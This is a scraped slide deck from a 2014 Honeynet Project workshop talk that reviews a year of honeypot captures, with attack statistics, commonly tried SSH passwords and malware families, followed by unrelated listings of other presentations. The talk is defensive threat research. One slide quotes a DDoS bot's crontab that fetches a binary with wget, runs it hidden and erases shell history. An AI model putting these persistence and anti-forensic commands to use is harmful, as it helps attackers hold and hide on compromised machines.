caught in the honeypot almost a year in review
play

Caught in the honeypot: (almost) a year in review ukasz Siewierski - PowerPoint PPT Presentation

Nov 03, 2022 •134 likes •285 views

Caught in the honeypot: (almost) a year in review ukasz Siewierski Polish Chapter / CERT Polska 2014 Honeynet Project Workshop Warsaw, 12th May, 2014 Honeeebox ukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11

  1. Caught in the honeypot: (almost) a year in review Łukasz Siewierski Polish Chapter / CERT Polska 2014 Honeynet Project Workshop Warsaw, 12th May, 2014

  2. Honeeebox Łukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11

  3. Setup Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  4. Setup Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  5. Setup ! t r o p p u s P T F S h t i w w o N Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  6. Setup ! t r o p p u s P T F S h t i w w o N Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  7. Statistics ( ∼ 1 month): Dionaea samples Captures Unique samples Distinct URLs Distinct IPs 1,475 1,290 135,981 345 Łukasz Siewierski Caught in the honeypot: (almost) a year in review 4 / 11

  8. Statistics ( ∼ 1 month): Kippo Unique logins Unique ASNs Sessions Distinct IPs 2,395 2,631 272 100 Łukasz Siewierski Caught in the honeypot: (almost) a year in review 5 / 11

  9. Statistics (1 month): popular passwords admin 123qwe!@# master 123qweasd 1q2w3e4r5t 1qaz@WSX 142536 abc123 123123 12345678 root00 12345 root@123 654321 password 1234 test toor 111 123 123qwe huawei qazwsx Passw0rd welcome 1234%^&* p@ssw0rd1 1q2w3e qweasd rootroot manager 0 redhat root1234 123.com qwe123 P@ssw0rd rootpass firewall 1234567890 passw0rd qwe123!@# power root123 password1 q1w2e3r4t5 abcd1234 1qaz2wsx admin123 123456789 qazxsw asdf1234 root 1q2w3e4r letmein Łukasz Siewierski Caught in the honeypot: (almost) a year in review 6 / 11

  10. Samples from Dionaea (Samba) 1 Popular worms: Conficker, Sality, Allaple etc. 2 Some autorun.inf files, e.g.: [autorun open= shell\open\Command=RECYCLER\NTDETECT.EXE D98009DC shell\open\Default=1 shell\explore\Command=RECYCLER\NTDETECT.EXE D98009DC 3 SysInternals PsExec (light-weight telnet replacement) 4 Samples detection rates (VT) are high, about 40-ish out of 50-ish Łukasz Siewierski Caught in the honeypot: (almost) a year in review 7 / 11

  11. SSH: DDoS (multiplatform) bots ELF 32-bit LSB executable, Intel 80386, rarely UPX-packed, rarely stripped (OOD in C++), usually linked statically. Recon (bruteforce SSH) then SFTP (binary/ies + cron file) Gathers all system info and pings back to C&C Wait for DDoS orders (DNS amplification, UDP flood etc.) Automatic updates (via cron!) Persistence achieved via /etc/rcx.d/ script and / or cron Łukasz Siewierski Caught in the honeypot: (almost) a year in review 8 / 11

  12. DDoS bot: cron magic */1 * * * * killall -9 .IptabLes */1 * * * * cd /var/log > dmesg */1 * * * * echo "unset MAILCHECK" >> /etc/profile */95 * * * * killall -9 ferwfrre */120 * * * * cd /root;rm -rf dir nohup.out */140 * * * * cd /etc; wget http://[xxx]/ferwfrre */96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1& */1 * * * * rm -rf /root/.bash history */1 * * * * touch /root/.bash history */1 * * * * history -r Łukasz Siewierski Caught in the honeypot: (almost) a year in review 9 / 11

  13. Do YOU know what attacks your network? Łukasz Siewierski Caught in the honeypot: (almost) a year in review 10 / 11

  14. Last slide Thank you for your attention Łukasz Siewierski Caught in the honeypot: (almost) a year in review 11 / 11

  15. Źródła This slides would not be so beautiful without: L A T EX and beamer (and many, many other packages), Wikimedia Commons and its pictures, which are available on GPL and Creative Commons licenses, Łukasz Siewierski Caught in the honeypot: (almost) a year in review 12 / 11

Recommend

5-Year Review OCP Monitoring Program 5 Year Review Annual Review Five Year Review

5-Year Review OCP Monitoring Program 5 Year Review Annual Review Five Year Review

OFFICIAL COMMUNITY PLAN 5-Year Review OCP Monitoring Program 5 Year Review Annual Review Five Year Review Snapshot of progress Trends and forecasts 17 annual indicators Identification of policy implications for

925 views • 40 slides
Honeypot technologies 2006 First Conference / tutorial Junes 2006

Honeypot technologies 2006 First Conference / tutorial Junes 2006

Honeypot technologies 2006 First Conference / tutorial Junes 2006 {Franck.Veysset,Laurent.Butti}@orange-ft.com D1 -June 2006 Agenda s Origins and background s Different kinds of honeypot Q High interaction honeypots Q Low interaction honeypots

1.5k views • 112 slides
Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. !

Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. !

Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. ! Founder, Honeynet Project & Moderator, honeypot mailing list ! Author, Honeypots: Tracking Hackers & Co- author, Know Your Enemy ! Work

676 views • 52 slides
Virtual machine introspection in a hybrid honeypot architecture Tamas K Lengyel & Justin

Virtual machine introspection in a hybrid honeypot architecture Tamas K Lengyel & Justin

Virtual machine introspection in a hybrid honeypot architecture Tamas K Lengyel & Justin Neumann University of Connecticut The role of the honeypot The limitations Low-interaction honeypots: "Artificial" attack surface

846 views • 13 slides
ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 7 Week 7 Census and Election Data

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 7 Week 7 Census and Election Data

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 7 Week 7 Census and Election Data Lecturer: Emi Tanaka Department of Econometrics and Business Statistics ETC5512.Clayton-x@monash.edu 6th May 2020 What is wild-caught data? data can

762 views • 47 slides
NOT SORRY FOR DOING IT, BUT VERY SORRY FOR GETTING CAUGHT: DEALING WITH

NOT SORRY FOR DOING IT, BUT VERY SORRY FOR GETTING CAUGHT: DEALING WITH

NOT SORRY FOR DOING IT, BUT VERY SORRY FOR GETTING CAUGHT: DEALING WITH PLAGIARISM IN THE ASIA PACIFIC CLASSROOM Presented by Contribu5ng author LEANDA CARE YVONNE MCNULTY Partner,

338 views • 18 slides
ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 12 Week 12 The proper care and feeding

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 12 Week 12 The proper care and feeding

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 12 Week 12 The proper care and feeding of wild data Lecturer: Dianne Cook Department of Econometrics and Business Statistics ETC5512.Clayton-x@monash.edu Image source:

486 views • 33 slides
UOIT Third Year Review Part 1: The Process Part 2: Documentation 1 3 rd Year Review

UOIT Third Year Review Part 1: The Process Part 2: Documentation 1 3 rd Year Review

UOITFA Third Year Review Workshop 2019-05-21 UOIT Third Year Review Part 1: The Process Part 2: Documentation 1 3 rd Year Review Article 19 of the Collective Agreement Give feedback and advice to tenure- stream Faculty Members at

492 views • 11 slides
DarkNOC Dashboard for Honeypot Management Bertrand Sobesto(1),

DarkNOC Dashboard for Honeypot Management Bertrand Sobesto(1),

DarkNOC Dashboard for Honeypot Management Bertrand Sobesto(1), Michel Cukier(1), Ma9 Hiltunen(2), David Kormann(2), Gregory Vesonder(2), Robin Berthier(3) (1)

437 views • 22 slides
ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 1 Week 1 Data collection Lecturer:

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 1 Week 1 Data collection Lecturer:

ETC5512: Wild Caught Data ETC5512: Wild Caught Data Week 1 Week 1 Data collection Lecturer: Didier Nibbering Department of Econometrics and Business Statistics ETC5512.Clayton-x@monash.edu Start with a question? 2/38 Start with a question?

504 views • 38 slides
UOIT Third Year Review 1 3 rd Year Review ! Article 19 of the Collective Agreement Give

UOIT Third Year Review 1 3 rd Year Review ! Article 19 of the Collective Agreement Give

UOIT%Faculty%Associa1on%3%Third%Year%Review% 16305311% Workshop%2016% UOIT Third Year Review 1 3 rd Year Review ! Article 19 of the Collective Agreement Give feedback and advice to tenure- stream Faculty Members at the rank of Assistant

439 views • 11 slides
4 Year Review Workshop Agenda 8:00 a.m. - Introductions 8:15 a.m. - What is 4 Year Review?

4 Year Review Workshop Agenda 8:00 a.m. - Introductions 8:15 a.m. - What is 4 Year Review?

Common Academic Program: 4 Year Review Workshop Agenda 8:00 a.m. - Introductions 8:15 a.m. - What is 4 Year Review? 8:20 a.m. - What is the Process? 8:30 a.m. - Experience with Assessment 9:30 a.m. - Planning & Next Steps What is 4

657 views • 26 slides
Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon 12 Ramin Sadre 1 SIGCOMM-WTMC, 20th August 2018 1 Institute of Information and Communication Technologies, Electronics and Applied Mathematics

561 views • 17 slides
The Year in Review The Year in Review Dr. Jeremy Haefner Provost and Senior Vice President for

The Year in Review The Year in Review Dr. Jeremy Haefner Provost and Senior Vice President for

The Year in Review The Year in Review Dr. Jeremy Haefner Provost and Senior Vice President for Academic Affairs May 2009 Year in Re ie Year in Review Roadmap Roadmap The Big Picture The 8 Priorities The Initiatives

807 views • 37 slides
State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical

State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical

State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical Project Lead dbw@cray.com XT Year in Review Accomplishments over the last 12 months Brief Glimpse of Future May 8, 2008 Cray Inc. Proprietary

682 views • 19 slides
HackersPot By Vsevolod Ivanov CART 360 HoneyPot HoneyPing Electronic plants

HackersPot By Vsevolod Ivanov CART 360 HoneyPot HoneyPing Electronic plants

HackersPot By Vsevolod Ivanov CART 360 HoneyPot HoneyPing Electronic plants http://advances.sciencemag.org/ content/1/10/e1501136.full Venus Flytrap Soft robotics http://biorobotics.snu.ac.kr/wp-co ntent/uploads/2014/05/2014_BIO

354 views • 16 slides
A Proposal for Securing a Large-Scale High-Interaction Honeypot J. Briffaut J.-F. Lalande

A Proposal for Securing a Large-Scale High-Interaction Honeypot J. Briffaut J.-F. Lalande

Honeypots architecture Security Properties Statistical results Conclusion A Proposal for Securing a Large-Scale High-Interaction Honeypot J. Briffaut J.-F. Lalande C. Toinard LIFO Universit dOrlans ENSI de Bourges SHPCS08,

401 views • 19 slides
Looking Back at 2019 & Ahead to 2020 Year in Review 2019 Year in Review 2019 Places of

Looking Back at 2019 & Ahead to 2020 Year in Review 2019 Year in Review 2019 Places of

Year in Review 2019 Looking Back at 2019 & Ahead to 2020 Year in Review 2019 Year in Review 2019 Places of Guaranteed Encounters with God The Bible The Ordinances Spiritual Gifts Suffering Spiritual Disciplines Corporate Worship

215 views • 20 slides
ANNUAL RESULTS For the year ended 29 September 2019 PRESENTATION OUTLINE REVIEW OF THE YEAR 1 2

ANNUAL RESULTS For the year ended 29 September 2019 PRESENTATION OUTLINE REVIEW OF THE YEAR 1 2

ANNUAL RESULTS For the year ended 29 September 2019 PRESENTATION OUTLINE REVIEW OF THE YEAR 1 2 FINANCIAL PERFORMANCE TRADING PERFORMANCE 3 4 NEW PRODUCTS CAPITAL INVESTMENT 5 6 OUTLOOK REVIEW OF THE YEAR REVIEW OF THE YEAR Strong

790 views • 47 slides
Industrial Control Systems Honeypot May1601 Aashwatth Agarwal Dan Borgerding Jon Hope Nik

Industrial Control Systems Honeypot May1601 Aashwatth Agarwal Dan Borgerding Jon Hope Nik

Industrial Control Systems Honeypot May1601 Aashwatth Agarwal Dan Borgerding Jon Hope Nik Kinkel Jon Osborne Korbin Stich http://may1601.sd.ece.iastate.edu Client : Alliant Energy Advisor : Dr. Doug Jacobson April 28, 2016 May1601 ICS

384 views • 15 slides
capturing CPE and IoT zero days Alexander Vetterl and Richard Clayton University of Cambridge

capturing CPE and IoT zero days Alexander Vetterl and Richard Clayton University of Cambridge

Honware: A virtual honeypot framework for capturing CPE and IoT zero days Alexander Vetterl and Richard Clayton University of Cambridge eCrime 2019, APWG Symposium on Electronic Crime Research November 14, 2019 Introduction Honeypot: A

224 views • 19 slides
Caught up in a war the WTO and Brexit What does leaving the EU on WTO terms mean? A

Caught up in a war the WTO and Brexit What does leaving the EU on WTO terms mean? A

Caught up in a war the WTO and Brexit What does leaving the EU on WTO terms mean? A presentation on some of the implications For some its no deal a Brexit with nothing agreed between the UK and EU. Others prefer to hide that

426 views • 25 slides
Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina Rente { jmfranco, frente } at dei.uc.pt Software and System Engineering Research Group FCT University of Coimbra Agenda Agenda

378 views • 16 slides
2019 USPS-R Fiscal Year-End Review 2019 Fiscal Year-End Review Please remember to follow the

2019 USPS-R Fiscal Year-End Review 2019 Fiscal Year-End Review Please remember to follow the

2019 USPS-R Fiscal Year-End Review 2019 Fiscal Year-End Review Please remember to follow the USPS-R Fiscal Year End Checklist when completing your fiscal year end process. 2 Pre-Closing-Overview Life Insurance Premium-NC1 Payments

807 views • 59 slides

More recommend